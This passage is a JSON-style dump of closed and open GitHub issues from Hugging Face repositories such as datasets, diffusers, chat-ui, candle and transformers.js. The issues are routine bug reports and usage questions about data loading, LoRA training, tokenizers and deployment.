`{'file': 'file_4.txt'}` in the column `meta`\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2038", "state": "closed", "labels": [ "bug", "documentation", "P1" ], "created_at": "2023-10-30T22:21:24Z", "updated_at": "2023-11-02T17:22:54Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6364, "title": "ArrowNotImplementedError: Unsupported cast from string to list using function cast_list", "body": "Hi,\r\n\r\nI am trying to load a local csv dataset(similar to explodinggradients_fiqa) using load_dataset. When I try to pass features, I am facing the mentioned issue.\r\n\r\nCSV Data sample(golden_dataset.csv):\r\nQuestion | Context | answer | groundtruth\r\n\"what is abc?\" | \"abc is this and that\" | \"abc is this \" | \"abc is this and that\"\r\n\r\n```\r\nimport csv \r\n\r\n# built it based on https://huggingface.co/datasets/explodinggradients/fiqa/viewer/ragas_eval?row=0\r\nmydict = [\r\n{'question' : \"what is abc?\", 'contexts': [\"abc is this and that\"], 'answer': \"abc is this \" , 'groundtruth': [\"abc is this and that\"]},\r\n{'question' : \"what is abc?\", 'contexts': [\"abc is this and that\"], 'answer': \"abc is this \" , 'groundtruth': [\"abc is this and that\"]},\r\n{'question' : \"what is abc?\", 'contexts': [\"abc is this and that\"], 'answer': \"abc is this \" , 'groundtruth': [\"abc is this and that\"]}\r\n]\r\n \r\nfields = ['question', 'contexts', 'answer', 'ground_truths'] \r\n\r\nwith open('golden_dataset.csv', 'w', newline='\\n') as file: \r\n writer = csv.DictWriter(file, fieldnames = fields)\r\n \r\n writer.writeheader() \r\n for row in mydict:\r\n writer.writerow(row)\r\n```\r\n\r\nRetrieved dataset:\r\nDatasetDict({\r\n train: Dataset({\r\n features: ['question', 'contexts', 'answer', 'ground_truths'],\r\n num_rows: 1\r\n })\r\n})\r\n\r\n\r\nCode to reproduce issue:\r\n\r\n\r\n```\r\nfrom datasets import load_dataset, Features, Sequence, Value\r\n\r\nencode_features = Features(\r\n {\r\n \"question\": Value(dtype='string', id=0),\r\n \"contexts\": Sequence(feature=Value(dtype='string', id=1)),\r\n \"answer\": Value(dtype='string', id=2),\r\n \"ground_truths\": Sequence(feature=Value(dtype='string',id=3)),\r\n }\r\n)\r\n\r\neval_dataset = load_dataset('csv', data_files='/golden_dataset.csv', features = encode_features )\r\n```\r\n\r\n\r\nError trace:\r\n\r\n```\r\n---------------------------------------------------------------------------\r\nArrowNotImplementedError Traceback (most recent call last)\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/datasets/builder.py:1925, in ArrowBasedBuilder._prepare_split_single(self, gen_kwargs, fpath, file_format, max_shard_size, job_id)\r\n 1924 _time = time.time()\r\n-> 1925 for _, table in generator:\r\n 1926 if max_shard_size is not None and writer._num_bytes > max_shard_size:\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/datasets/packaged_modules/csv/csv.py:192, in Csv._generate_tables(self, files)\r\n 189 # Uncomment for debugging (will print the Arrow table size and elements)\r\n 190 # logger.warning(f\"pa_table: {pa_table} num rows: {pa_table.num_rows}\")\r\n 191 # logger.warning('\\n'.join(str(pa_table.slice(i, 1).to_pydict()) for i in range(pa_table.num_rows)))\r\n--> 192 yield (file_idx, batch_idx), self._cast_table(pa_table)\r\n 193 except ValueError as e:\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/datasets/packaged_modules/csv/csv.py:167, in Csv._cast_table(self, pa_table)\r\n 165 if all(not require_storage_cast(feature) for feature in self.config.features.values()):\r\n 166 # cheaper cast\r\n--> 167 pa_table = pa.Table.from_arrays([pa_table[field.name] for field in schema], schema=schema)\r\n 168 else:\r\n 169 # more expensive cast; allows str <-> int/float or str to Audio for example\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/table.pxi:3781, in pyarrow.lib.Table.from_arrays()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/table.pxi:1449, in pyarrow.lib._sanitize_arrays()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/array.pxi:354, in pyarrow.lib.asarray()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/table.pxi:551, in pyarrow.lib.ChunkedArray.cast()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/compute.py:400, in cast(arr, target_type, safe, options, memory_pool)\r\n 399 options = CastOptions.safe(target_type)\r\n--> 400 return call_function(\"cast\", [arr], options, memory_pool)\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/_compute.pyx:572, in pyarrow._compute.call_function()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/_compute.pyx:367, in pyarrow._compute.Function.call()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/error.pxi:144, in pyarrow.lib.pyarrow_internal_check_status()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/error.pxi:121, in pyarrow.lib.check_status()\r\n\r\nArrowNotImplementedError: Unsupported cast from string to list using function cast_list\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nDatasetGenerationError Traceback (most recent call last)\r\nCell In[57], line 1\r\n----> 1 eval_dataset = load_dataset('csv', data_files='/golden_dataset.csv", "url": "https://github.com/huggingface/datasets/issues/6364", "state": "closed", "labels": [], "created_at": "2023-10-30T20:14:01Z", "updated_at": "2023-10-31T19:21:23Z", "comments": 2, "user": "divyakrishna-devisetty" }, { "repo": "huggingface/diffusers", "number": 5575, "title": "How to set the \"transformer_in\" layer's hidden size in LoRA training?", "body": "### Describe the bug\r\n\r\nI modify the code for text-to-image [lora](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_lora.py) as Figure 1,\r\n\"image\"\r\nHowever, in 3D UNet there is a \"transformer_in\" layer that does not exist in 2D UNet. So I add \"transformer_in\" process in the code. And I set the \"hidden_size\" to be \"unet.config.block_out_channels[0]\" following the 3D UNet's definition as [this link](https://github.com/huggingface/diffusers/blob/main/src/diffusers/models/unet_3d_condition.py) Figure 2:\r\n\"image\"\r\nBut the there is a shape error as Figure 3\r\n![image](https://github.com/huggingface/diffusers/assets/52530394/7a279e34-2af8-4409-8e93-606f61fd506f)\r\n:\r\n\r\n\r\n### Reproduction\r\n\r\nLoad a 3D UNet. Adapt the LoRA codes as Figure 1.\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\n- `diffusers` version: 0.21.4\r\n- Platform: Linux-5.11.0-34-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.13\r\n- PyTorch version (GPU?): 2.0.1 (True)\r\n- Huggingface_hub version: 0.18.0\r\n- Transformers version: 4.26.0\r\n- Accelerate version: 0.23.0\r\n- xFormers version: 0.0.22.post7\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n\r\n### Who can help?\r\n\r\n@sayakpaul @patrickvonplaten @DN6 @yiyi", "url": "https://github.com/huggingface/diffusers/issues/5575", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-10-30T03:44:32Z", "updated_at": "2024-01-10T15:07:20Z", "user": "lxycopper" }, { "repo": "huggingface/diffusers", "number": 5574, "title": "How to train a part of UNet attention parameters with LoRA", "body": "### Describe the bug\n\nI adapt the LoRA training code in # to train my model. \r\n\r\nAnd I only want to update the parameters in \"down block\", so I comment out the code for other attention blocks:\r\n\"image\"\r\nHowever, I got an error at this line \"unet.set_attn_processor(lora_attn_procs)\" as shown in the code:\r\n\"image\"\r\n\n\n### Reproduction\n\ncomment out the code for other attention blocks as my first figure.\n\n### Logs\n\n_No response_\n\n### System Info\n\ndiffusers 0.21.4\r\npython 3.10.13\r\nUbuntu 18\r\n\n\n### Who can help?\n\n@sayakpaul @patr", "url": "https://github.com/huggingface/diffusers/issues/5574", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-10-30T02:58:07Z", "updated_at": "2023-12-08T15:05:16Z", "user": "lxycopper" }, { "repo": "huggingface/transformers.js", "number": 372, "title": "[Question] onnxruntime_binding.node issue on mac electron app", "body": "Hi,\r\nI'm getting this error on an intel macbook running an electron forge app:\r\n```\r\n(node:63267) UnhandledPromiseRejectionWarning: Error: Cannot find module '../bin/napi-v3/darwin/x64/onnxruntime_binding.node'\r\nRequire stack:\r\n- /Users/sam/Desktop/electron-forge-react-typescript-tailwind/.webpack/main/index.js\r\n- /Users/sam/Desktop/electron-forge-react-typescript-tailwind/node_modules/electron/dist/Electron.app/Contents/Resources/default_app.asar/main.js\r\n- \r\n at Module._resolveFilename (node:internal/modules/cjs/loader:963:15)\r\n at n._resolveFilename (node:electron/js2c/browser_init:2:109411)\r\n at Module._load (node:internal/modules/cjs/loader:811:27)\r\n at f._load (node:electron/js2c/asar_bundle:2:13330)\r\n at Module.require (node:internal/modules/cjs/loader:1035:19)\r\n at require (node:internal/modules/cjs/helpers:102:18)\r\n at ./node_modules/@xenova/transformers/node_modules/onnxruntime-node/dist/binding.js (/Users/sam/Desktop/electron-forge-react-typescript-tailwind/.webpack/main/index.js:229:1)\r\n at __webpack_require__ (/Users/sam/Desktop/electron-forge-react-typescript-tailwind/.webpack/main/index.js:83093:42)\r\n at ./node_modules/@xenova/transformers/node_modules/onnxruntime-node/dist/backend.js (/Users/sam/Desktop/electron-forge-react-typescript-tailwind/.webpack/main/index.js:153:19)\r\n```\r\nI check the path ```../bin/napi-v3/darwin/x64/onnxruntime_binding.node``` and it does exist in node_modules. So I'm not sure what's going on/whether this is a bug. ", "url": "https://github.com/huggingface/transformers.js/issues/372", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-28T00:34:05Z", "updated_at": "2023-11-01T21:56:19Z", "user": "samlhuillier" }, { "repo": "huggingface/transformers", "number": 27107, "title": "How to export a Marian model in rust ?", "body": "Most models based on Marian are also available in rust, such as : Helsinki-NLP/opus-mt-en-roa\r\n\r\nIs it possible to do this using transformers ?\r\nDid you asssit Helsinki-NLP in exporting the models to Rust ?", "url": "https://github.com/huggingface/transformers/issues/27107", "state": "closed", "labels": [], "created_at": "2023-10-27T13:01:13Z", "updated_at": "2023-12-05T08:03:53Z", "user": "flutter-painter" }, { "repo": "huggingface/chat-ui", "number": 535, "title": "API format?", "body": "ok, so this may be a dumb question, but i am not sure where else to ask it. So if we use this repo to deploy our app on HF, what is the format of the API parameters for calling our space?", "url": "https://github.com/huggingface/chat-ui/issues/535", "state": "closed", "labels": [], "created_at": "2023-10-26T21:56:22Z", "updated_at": "2023-10-27T15:01:57Z", "comments": 3, "user": "silvacarl2" }, { "repo": "huggingface/diffusers", "number": 5538, "title": "Why is the pipeline_stable_diffusion_upscale.py file not using the encoder-decoder latent?", "body": "### Describe the bug\n\nThere is no training script for pipeline_stable_diffusion_upscale.py because the authors chose not to utilize the latent domain for the Super-resolution task. Additionally, the U-Net implemented in pipeline_stable_diffusion_upscale.py only accepts 7 channels. How is this achieved?\n\n### Reproduction\n\nNone\n\n### Logs\n\n_No response_\n\n### System Info\n\nNone\n\n### Who can help?\n\n[AnasHXH](https://github.com/AnasHXH)", "url": "https://github.com/huggingface/diffusers/issues/5538", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-10-26T10:47:10Z", "updated_at": "2023-12-08T15:05:44Z", "user": "AnasHXH" }, { "repo": "huggingface/chat-ui", "number": 534, "title": "Login issue with Google OpenID", "body": "I set up google OpenID for my chatUI. I have set the scope to openId and ./auth/userinfo.profile in OAuth Consent Screen. I tried to log the data shared by google to the app and it was the following \r\n\r\n{\r\n sub: '****',\r\n picture: 'https://lh3.googleusercontent.com/****',\r\n email: 'shagun@****',\r\n email_verified: true,\r\n hd: '*****'\r\n} \r\n\r\nAs you can see, the name is not being shared and hence I am getting an error as Name is a required field. How can I fix this? \r\n\r\nNote: Google shares name for some accounts and for them it does not. This is my first time working with OpenID so any help will be appreciated.", "url": "https://github.com/huggingface/chat-ui/issues/534", "state": "closed", "labels": [], "created_at": "2023-10-26T10:00:05Z", "updated_at": "2023-10-26T10:49:36Z", "comments": 3, "user": "shagunhexo" }, { "repo": "huggingface/candle", "number": 1185, "title": "Question: How to create a Var from MmapedSafetensors", "body": "Hello everybody,\r\n\r\nI was wondering how to create a Var instance from an `MMapedSafetensors` `TensorView`. I have tried using `candle_core::Var::from_slice(tensor.data(), tensor.shape(), &device)?`, but I get the error:\r\n\r\n`Error: Shape mismatch, got buffer of size 90177536 which is compatible with shape [11008, 4096]`.\r\n\r\nIs there a better way to do this? \r\n\r\nIn addition, I notice the buffer is of type `u8`, which is definitely not the data type the safetensors should be decoded as. Where can I find how `VarBuilder` does this?\r\n\r\n**In summary, I have 2 questions:**\r\n- How to decode a `TensorView` into a `Var`?\r\n- Or, if the above is not feasible, how does `VarBuilder` do this?", "url": "https://github.com/huggingface/candle/issues/1185", "state": "closed", "labels": [], "created_at": "2023-10-26T09:41:37Z", "updated_at": "2023-10-26T11:26:29Z", "user": "EricLBuehler" }, { "repo": "huggingface/datasets", "number": 6353, "title": "load_dataset save_to_disk load_from_disk error", "body": "### Describe the bug\r\n\r\ndatasets version\uff1a 2.10.1\r\nI `load_dataset `and `save_to_disk` sucessfully on windows10( **and I `load_from_disk(/LLM/data/wiki)` succcesfully on windows10**), and I copy the dataset `/LLM/data/wiki`\r\ninto a ubuntu system, but when I `load_from_disk(/LLM/data/wiki)` on ubuntu, something weird happens:\r\n\r\n\r\n```\r\nload_from_disk('/LLM/data/wiki')\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/datasets/load.py\", line 1874, in load_from_disk\r\n return DatasetDict.load_from_disk(dataset_path, keep_in_memory=keep_in_memory, storage_options=storage_options)\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/datasets/dataset_dict.py\", line 1309, in load_from_disk\r\n dataset_dict[k] = Dataset.load_from_disk(\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/datasets/arrow_dataset.py\", line 1543, in load_from_disk\r\n fs_token_paths = fsspec.get_fs_token_paths(dataset_path, storage_options=storage_options)\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/fsspec/core.py\", line 610, in get_fs_token_paths\r\n chain = _un_chain(urlpath0, storage_options or {})\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/fsspec/core.py\", line 325, in _un_chain\r\n cls = get_filesystem_class(protocol)\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/fsspec/registry.py\", line 232, in get_filesystem_class\r\n raise ValueError(f\"Protocol not known: {protocol}\")\r\nValueError: Protocol not known: /LLM/data/wiki\r\n```\r\nIt seems that something went wrong on the arrow file?\r\nHow can I solve this , since currently I can not save_to_disk on ubuntu system\r\n\r\n### Steps to reproduce the bug\r\n\r\ndatasets version\uff1a 2.10.1\r\n\r\n### Expected behavior\r\n\r\ndatasets version\uff1a 2.10.1\r\n\r\n### Environment info\r\n\r\ndatasets version\uff1a 2.10.1", "url": "https://github.com/huggingface/datasets/issues/6353", "state": "closed", "labels": [], "created_at": "2023-10-26T03:47:06Z", "updated_at": "2024-04-03T05:31:01Z", "comments": 5, "user": "brisker" }, { "repo": "huggingface/text-embeddings-inference", "number": 43, "title": "How to add custom python file for pretrained model on TEI server?", "body": "### System Info\r\n\r\nI am pretty new to this space. Please help.\r\nI have made a python file with pre-trained model, which generates embeddings. What I want is to -\r\n1. Create a docker image of Python file\r\n2. Run it on TEI server?\r\n\r\n\r\nHow can we do this?\r\n\r\n\r\n\r\n\r\n\r\n\r\n### Information\r\n\r\n- [ ] Docker\r\n- [ ] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported command\r\n- [X] My own modifications\r\n\r\n### Reproduction\r\n\r\nNeed to host a custom python file( which runs a sentence embedding model) on TEI server\r\n\r\n### Expected behavior\r\n\r\nNA", "url": "https://github.com/huggingface/text-embeddings-inference/issues/43", "state": "open", "labels": [], "created_at": "2023-10-25T16:09:52Z", "updated_at": "2023-10-25T17:57:46Z", "user": "cken21" }, { "repo": "huggingface/llm-vscode", "number": 100, "title": "How to generate the response from locally hosted end point in vscode?", "body": "Hi,\r\n\r\nI managed to plug the llm-vcode extension to point to the locally running endpoint. Now when I am selected the content like as below:\r\n# function to sum 2 numbers in python \r\nthen Cmd+shif+a > llm: show code attribution \r\nMy local endpoint invokes and give the relevant response as well in below format \r\n\r\n`{\r\n \"details\": {\r\n \"best_of_sequences\": [\r\n {\r\n \"finish_reason\": \"length\",\r\n \"generated_text\": \"test\",\r\n \"generated_tokens\": 1,\r\n \"prefill\": [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"text\": \"test\"\r\n }\r\n ],\r\n \"seed\": 42,\r\n \"tokens\": [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"special\": false,\r\n \"text\": \"test\"\r\n }\r\n ],\r\n \"top_tokens\": [\r\n [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"special\": false,\r\n \"text\": \"test\"\r\n }\r\n ]\r\n ]\r\n }\r\n ],\r\n \"finish_reason\": \"length\",\r\n \"generated_tokens\": 1,\r\n \"prefill\": [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"text\": \"test\"\r\n }\r\n ],\r\n \"seed\": 42,\r\n \"tokens\": [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"special\": false,\r\n \"text\": \"test\"\r\n }\r\n ],\r\n \"top_tokens\": [\r\n [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"special\": false,\r\n \"text\": \"test\"\r\n }\r\n ]\r\n ]\r\n },\r\n \"generated_text\": \"test\"\r\n}`\r\n\"generated_text\": value is replaced with actual response with python sum function\r\n\r\nAfter 200, I can see the anything related to generated code in vscode. \r\n\r\nPlease suggest to how to I can get generated response in vscode itself.", "url": "https://github.com/huggingface/llm-vscode/issues/100", "state": "open", "labels": [ "stale" ], "created_at": "2023-10-25T15:55:40Z", "updated_at": "2023-11-25T01:46:01Z", "user": "dkaus1" }, { "repo": "huggingface/tokenizers", "number": 1375, "title": "Question: what is the add_special_tokens parameter of Tokenizer::encode?", "body": "As stated above, what does the parameter add_special_tokens do? Does it add bos/eos tokens? Thanks!", "url": "https://github.com/huggingface/tokenizers/issues/1375", "state": "closed", "labels": [], "created_at": "2023-10-25T09:55:55Z", "updated_at": "2023-10-25T18:43:54Z", "user": "EricLBuehler" }, { "repo": "huggingface/candle", "number": 1173, "title": "Question: what is the add_special_tokens parameter of Tokenizer::encode?", "body": "As stated above, what does the parameter add_special_tokens do? Does it add bos/eos tokens? Thanks!", "url": "https://github.com/huggingface/candle/issues/1173", "state": "closed", "labels": [], "created_at": "2023-10-25T09:30:01Z", "updated_at": "2023-10-25T09:55:42Z", "user": "EricLBuehler" }, { "repo": "huggingface/dataset-viewer", "number": 2009, "title": "Are URLs in rows response sanitized?", "body": "see https://github.com/huggingface/moon-landing/pull/7798#discussion_r1369813236 (internal)\r\n\r\n> Is \"src\" validated / sanitized?\r\n> if not there is a potential XSS exploit here (you can inject javascript code in an image src)\r\n\r\n> Are S3 object names sanitized? If no, it should be the case in dataset-server side", "url": "https://github.com/huggingface/dataset-viewer/issues/2009", "state": "closed", "labels": [ "question", "security", "P1" ], "created_at": "2023-10-24T15:10:29Z", "updated_at": "2023-11-21T15:39:13Z", "user": "severo" }, { "repo": "huggingface/chat-ui", "number": 528, "title": "Websearch error in proxy", "body": "I'm developing in a proxy environment, I'm guessing it's because **websearch module can't import the model(Xenova/gte-small) from huggingface.**\r\nI don't want to use websearch, but it tries to load the gte-small model anyway, and I get an error.\r\n\r\n```\r\n11:36:36 AM [vite] Error when evaluating SSR module /src/lib/server/websearch/sentenceSimilarity.ts:\r\n|- TypeError: fetch failed\r\n at fetch (/home/dev/chat-ui/node_modules/undici/index.js:110:15)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async getModelFile (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n at async getModelJSON (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 1)\r\n at async loadTokenizer (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n at async AutoTokenizer.from_pretrained (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n at async Promise.all (index 0)\r\n at async loadItems (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2110:5)\r\n at async Proxy.pipeline (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2056:19)\r\n\r\n11:36:36 AM [vite] Error when evaluating SSR module /src/lib/server/websearch/runWebSearch.ts: failed to import \"/src/lib/server/websearch/sentenceSimilarity.ts\"\r\n|- TypeError: fetch failed\r\n at fetch (/home/dev/chat-ui/node_modules/undici/index.js:110:15)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async getModelFile (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n at async getModelJSON (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 1)\r\n at async loadTokenizer (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n at async AutoTokenizer.from_pretrained (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n at async Promise.all (index 0)\r\n at async loadItems (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2110:5)\r\n at async Proxy.pipeline (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2056:19)\r\n\r\n11:36:36 AM [vite] Error when evaluating SSR module /home/dev/chat-ui/src/routes/conversation/[id]/+server.ts: failed to import \"/src/lib/server/websearch/runWebSearch.ts\"\r\n|- TypeError: fetch failed\r\n at fetch (/home/dev/chat-ui/node_modules/undici/index.js:110:15)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async getModelFile (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n at async getModelJSON (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 1)\r\n at async loadTokenizer (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n at async AutoTokenizer.from_pretrained (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n at async Promise.all (index 0)\r\n at async loadItems (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2110:5)\r\n at async Proxy.pipeline (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2056:19)\r\n\r\n```\r\n\r\n\r\n1. Is there a workaround to downloading the model directly?\r\n2. Need Improve: the proxy related code.\r\n3. Need Improve: add option to turn off websearch initialization. (", "url": "https://github.com/huggingface/chat-ui/issues/528", "state": "closed", "labels": [ "enhancement", "support", "websearch" ], "created_at": "2023-10-24T03:53:25Z", "updated_at": "2023-11-15T15:44:01Z", "comments": 6, "user": "calycekr" }, { "repo": "huggingface/candle", "number": 1165, "title": "How do I raise 2 to the power of a tensor?", "body": "How do I write:\r\n\r\n```python\r\nx = 2 ** (y * z)\r\n```\r\n\r\nWhere `y` is an integer and `z` is a tensor?\r\nI tried to use `powf`, but it only works with float arguments.", "url": "https://github.com/huggingface/candle/issues/1165", "state": "closed", "labels": [], "created_at": "2023-10-23T22:13:28Z", "updated_at": "2023-10-24T04:28:23Z", "user": "laptou" }, { "repo": "huggingface/candle", "number": 1163, "title": "how to modify the contents of a Tensor?", "body": "what is the `candle` equivalent of this?\r\n\r\n```python\r\nt[2, :] *= 2;\r\n```", "url": "https://github.com/huggingface/candle/issues/1163", "state": "closed", "labels": [], "created_at": "2023-10-23T19:58:50Z", "updated_at": "2023-10-24T04:28:10Z", "user": "laptou" }, { "repo": "huggingface/transformers.js", "number": 367, "title": "[Question] How to include ort-wasm-simd.wasm with the bundle?", "body": "How can I include ort-wasm-simd.wasm with the bundle? I'm using this on an app that needs to be able to run offline, so I'd like to package this with the lib. I'm also running this on web worker, so that file gets requested 1+n times per user session when the worker starts.\r\n\"image\"\r\n", "url": "https://github.com/huggingface/transformers.js/issues/367", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-23T04:54:16Z", "updated_at": "2023-10-26T08:27:28Z", "user": "mjp0" }, { "repo": "huggingface/autotrain-advanced", "number": 310, "title": "How to determine the LMTrainingType ? chat or generic mode?", "body": "It is said that there are two modes (chat and generic), but I cannot find a way to determine it.", "url": "https://github.com/huggingface/autotrain-advanced/issues/310", "state": "closed", "labels": [], "created_at": "2023-10-21T14:28:59Z", "updated_at": "2023-11-26T04:31:08Z", "user": "qiaoqiaoLF" }, { "repo": "huggingface/datasets", "number": 6324, "title": "Conversion to Arrow fails due to wrong type heuristic", "body": "### Describe the bug\n\nI have a list of dictionaries with valid/JSON-serializable values. \r\n\r\nOne key is the denominator for a paragraph. In 99.9% of cases its a number, but there are some occurences of '1a', '2b' and so on.\r\n\r\nIf trying to convert this list to a dataset with `Dataset.from_list()`, I always get\r\n`ArrowInvalid: Could not convert '1' with type str: tried to convert to int64`, presumably because pyarrow tries to convert the keys to integers.\r\n\r\nIs there any way to circumvent this and fix dtypes? I didn't find anything in the documentation.\n\n### Steps to reproduce the bug\n\n* create a list of dicts with one key being a string of an integer for the first few thousand occurences and try to convert to dataset.\r\n\n\n### Expected behavior\n\nThere shouldn't be an error (e.g. some flag to turn off automatic str to numeric conversion).\n\n### Environment info\n\n- `datasets` version: 2.14.5\r\n- Platform: Linux-5.15.0-84-generic-x86_64-with-glibc2.35\r\n- Python version: 3.9.18\r\n- Huggingface_hub version: 0.17.3\r\n- PyArrow version: 13.0.0\r\n- Pandas version: 2.1.1", "url": "https://github.com/huggingface/datasets/issues/6324", "state": "closed", "labels": [], "created_at": "2023-10-20T23:20:58Z", "updated_at": "2023-10-23T20:52:57Z", "comments": 2, "user": "jphme" }, { "repo": "huggingface/transformers.js", "number": 365, "title": "[Question] Headers not defined", "body": "Hi friends!\r\n\r\nNeither headers nor fetch seems to be getting resolved.. trying to run this on a nodejs application...\r\n\r\nfile:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:201\r\n return fetch(urlOrPath, { headers });\r\n ^\r\n\r\nTypeError: fetch is not a function\r\n at getFile (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:201:16)\r\n at getModelFile (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:468:30)\r\n at async getModelJSON (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 0)\r\n at async loadTokenizer (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/tokenizers.js:52:16)\r\n at async Function.from_pretrained (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/tokenizers.js:3826:48)\r\n at async Promise.all (index 0)\r\n at async loadItems (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/pipelines.js:2193:5)\r\n at async pipeline (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/pipelines.js:2139:19)\r\n at async Server. (/home/rajesh/code/ai/js/invoice/inv.js:65:24)\r\n\r\n-------\r\n\r\nUnable to load from local path \"/home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/models/Xenova/distilbert-base-uncased-finetuned-sst-2-english/tokenizer.json\": \"ReferenceError: Headers is not defined\"\r\nUnable to load from local path \"/home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/models/Xenova/distilbert-base-uncased-finetuned-sst-2-english/tokenizer_config.json\": \"ReferenceError: Headers is not defined\"\r\nUnable to load from local path \"/home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/models/Xenova/distilbert-base-uncased-finetuned-sst-2-english/config.json\": \"ReferenceError: Headers is not defined\"\r\nfile:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:188\r\n const headers = new Headers();\r\n ^\r\n\r\nReferenceError: Headers is not defined\r\n at getFile (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:188:25)\r\n at getModelFile (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:468:30)\r\n at async getModelJSON (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 0)\r\n at async loadTokenizer (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/tokenizers.js:52:16)\r\n at async Function.from_pretrained (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/tokenizers.js:3826:48)\r\n at async Promise.all (index 0)\r\n at async loadItems (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/pipelines.js:2193:5)\r\n at async pipeline (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/pipelines.js:2139:19)", "url": "https://github.com/huggingface/transformers.js/issues/365", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-20T16:29:28Z", "updated_at": "2023-11-22T06:15:35Z", "user": "trilloc" }, { "repo": "huggingface/sentence-transformers", "number": 2335, "title": "How to get individual token embeddings of a sentence from sentence transformers", "body": "How to get individual token embeddings of a sentence from sentence transformers", "url": "https://github.com/huggingface/sentence-transformers/issues/2335", "state": "closed", "labels": [], 